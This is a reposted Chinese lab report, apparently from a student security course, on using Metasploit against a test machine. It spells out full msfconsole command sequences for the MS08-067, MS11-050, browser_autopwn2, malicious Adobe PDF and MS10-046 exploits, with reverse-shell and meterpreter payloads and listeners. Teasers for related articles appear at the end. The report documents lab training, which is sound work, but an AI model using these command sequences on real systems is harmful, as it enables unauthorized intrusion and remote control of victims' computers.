Exp5:MSF基础应用

MSF渗透测试实战
最新推荐文章于 2025-06-23 20:23:55 发布
转载 最新推荐文章于 2025-06-23 20:23:55 发布 · 132 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/elevator/p/8974744.html
文章标签:

#操作系统 #网络 #运维

Exp5:MSF基础应用

一、基础问题回答

(1)用自己的话解释什么是 exploit , payload , encode.

exploit: 设相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。

payload: 简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务。

encode: 针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。

二、实践过程

  • 1.Windows服务渗透攻击——MS08-067安全漏洞

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

      msf > use exploit/windows/smb/ms08_067_netapi

      msf exploit(ms08_067_netapi) > show payloads

      msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连

      msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻击机ip

      msf exploit(ms08_067_netapi) > set LPORT 5213 //攻击端口

      msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶机ip,特定漏洞端口已经固定

      msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高

      msf exploit(ms08_067_netapi) > exploit //攻击

      1071611-20180425150951955-690107461.png

    • 此时需要关闭靶机的防火墙,不然会出现ConnectionTimeOut的失败;
      1071611-20180425151227878-12882830.png

    • 攻击成功后的结果:
      1071611-20180425151208516-436751764.png

  • 2.浏览器渗透攻击——MS11-050

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    msf > use windows/browser/ms11_050_mshtml_cobjectelement

    msf exploit(ms11_050_cobjectelement) > set payload
    windows/meterpreter/reverse_http //http反向回连

    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻击端口固定

    msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //统一资源标识符路径设置

    msf exploit(ms11_050_cobjectelement) > exploit

    1071611-20180425155338496-1583019712.png
  • 测试无法成功,总是会出现IE浏览器的错误,我觉得问题是出在浏览器版本不对,不适合那个漏洞,既然如此,那就换个漏洞呗,下面使用一种自动根据浏览器版本选择合适的漏洞进行攻击的方法
    • ** 实施browser_autopwn模块 **

      • 现在攻击机里进入msfconsole,然后分别输入

        use auxiliary/server/browser_autopwn2

        set SRVHOST 192.168.43.161

        set URIPATH auto

        show options

        1071611-20180430203730400-125916803.png

      • 开始攻击,此时可以看到msf在不停的尝试不同的payload
        1071611-20180430203957409-1174632584.png

      • 尝试成功,输出了可被访问的URL http://192.168.43.161:8080/auto并启动服务器;
        1071611-20180430204157407-1147460713.png

      • 在靶机浏览器上输入URL后,浏览器跳转到 http://192.168.43.161:8080/auto/FaOGsp
        1071611-20180430204330163-1548396302.png

      • 回头看一下kali机,发现回连成功了,输入session -i 2获取对话,此时,已经获得了靶机的控制权。
        1071611-20180430204516269-1386293486.png

  • 3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
    msf > use windows/fileformat/adobe_cooltype_sing

    msf exploit(adobe_cooltype_sing) > set payload
    windows/meterpreter/reverse_tcp //tcp反向回连

    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻击端口

    msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //设置生成pdf文件的名字

    msf exploit(adobe_cooltype_sing) > exploit //攻击

    • 将生成的pdf文件拷贝到靶机上。
      1071611-20180425163724233-790187637.png

    • 在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    msf > use exploit/multi/handler //进入监听模块

    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接

    msf exploit(handler) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(handler) > set LPORT 5213 //攻击端口固定

    msf exploit(handler) > exploit

    1071611-20180425163757777-1811513446.png
    • 在靶机上打开5213lzm.pdf文件:
      1071611-20180425163551657-838722064.png
    • 攻击机显示攻击成功:
      1071611-20180425163951670-625950951.png
  • 4.快捷方式图标漏洞——MS10-046
    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

      msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

      msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48 //攻击机ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp //tcp反向回连

      msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48 //攻击机ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > exploit //攻击

      1071611-20180430210544239-1051754010.png
      • 此时弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标:
        1071611-20180430210647557-365346095.png
      • 对于已建立好了会话,通过命令sessions查看,并选择sessions -i 1,获得靶机控制权。
        1071611-20180430210745340-2130813176.png
        (PS)本次试验时间上跨度有点大,没能连贯的做完,第四个项任务是在ciscn结束之后做的,而此时的kali机已被折腾崩了,所以考了别人的虚拟机,继续做完了,这里的IP不是之前那个。

三、实践总结及体会

本次试验给我最深的感触就是msf的强大,活用msf真的能够在渗透测试或者以攻击为目的的行为给予很大帮助,同时,为了防止被攻击,还是及时更新系统,填补漏洞,因为有一双研眼镜正在窥探你的笔记本。

转载于:https://www.cnblogs.com/elevator/p/8974744.html

详尽的msf——meterpreter——渗透测试教程
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
渗透工具——kali中msf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 9573
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
msf完整渗透测试
clayzx的博客
11-15 6702
从生成shell到远程连接 前言: 本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole提供一个资料参考。不说废话了,以下是我们这篇的目标: 1.生成shell 2.上shell 3.监听 4.拿到会话 5.提权 6.拿到密码 7.远程连接 首先此次实验需要准备一台kali的虚拟机和一台windows 7的
MSF渗透攻击
最新发布
balareshe的博客
06-23 915
​:MSF渗透攻击作为双刃剑,既是攻防演练的核心工具,也是安全体系的试金石。防御者需通过持续漏洞管理、最小权限原则和实时监控构建动态防御矩阵,方能在对抗中占据主动。
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 5390
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
内网渗透 Metasploit(MSF基础使用
qq_49433473的博客
10-24 1万+
内网渗透 Metasploit(MSF)使用,信息搜集,模块详解,端口扫描,反弹shell
Exp6 MSF应用基础
qq_57435798的博客
05-04 828
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。exploit是载具,连接漏洞,将payload传送到靶机中。payload是载荷,是exploit中shellcode中的主要功能代码,exploit把它送到靶机中后,是真正负责进行攻击代码。encode是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 500
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
Exp6 MSF应用基础 20204308李文艳
m0_61155000的博客
04-22 736
exploit:指的是渗透攻击攻击应用或安全漏洞,如缓冲区溢出等,把整个恶意代码背过去,并进行安全漏洞攻击的整个过程。payload:指的是“有效载荷”。被搬运的东西,而这个“东西”我们目前接触到的是一段 shellcode(机器指令)。encode:指的是编码。一般使用编码器对“坏字符”进行变换,去除坏字符的影响。(不同环境下,坏字符不一样。原本code → 一段解码的程序 + 变换后的code (可进行迭代多次)
20194311姜晨昊Exp6-MSF应用基础
weixin_51927594的博客
05-10 723
零、实验准备 安装win7虚拟机,迅雷下载种子如下 ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_u_677332.iso|3320903680|743598C64E635C72964CF02A3E0AD547|/ VM简易安装,一直下一步即可 一、实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。 1.1 一个主动攻击实践 使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 永恒之蓝是指201
metasploit(MSF渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 2312
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
Metasploit Framework(MSF)实战宝典:从入门到精通的渗透测试全流程与案例解析 MSF简这个黑客利器工具
浩策盾悟
10-03 2万+
搜索出来好几个ms17-010,到底哪个是win7的攻击漏洞,我们要根据提示信息和手动验证的方式来验证,或者去网上查一下哪个是针对win7的,我已经给大家找到了,如下:一般exploit开头的都是直接渗透攻击的工具,也就是在这里面选。内存溢出提出最高权限,也就是通过本地溢出的权限提出最高的权限,也就是通过运行一下现成的,能造成溢出漏洞得exploit。扫描器向目标主机的一个端口发送请求连接的SYN包,扫描器在收到SYN/ACK后,不是发送的ACK应答而是发送RST包请求断开连接。
Linux-Metasploit 渗透-魔鬼教程
m0_74025111的博客
04-20 3365
这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号) -sV 扫描服务器版本。
初学MSF渗透、提权、免杀(上)
qq_53058639的博客
08-01 2455
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
渗透工具之msf
热门推荐
rentian1的博客
03-30 4万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。 构造...
Kali利用msf渗透Windows电脑(超详细)
jennycisp的博客
02-27 3229
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
MSF渗透基础知识
m0_63917373的博客
02-20 504
MSF windows提权 渗透安卓 Metasploit
使用msf工具对安卓手机进行渗透攻击———超详细
weixin_71669458的博客
07-28 2万+
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
渗透测试工具MSF
2303_77223717的博客
07-08 1551
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台,集成数千个漏洞利用、辅助测试模块。
pwn的exp
03-08
上述操作将配置好用于发起攻击基础条件[^2]。 #### 开发Exploit过程 创建一个成功的exploit需要理解目标应用程序的工作原理以及如何绕过其保护机制。这包括但不限于识别可用空间来注入shellcode、寻找合适的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值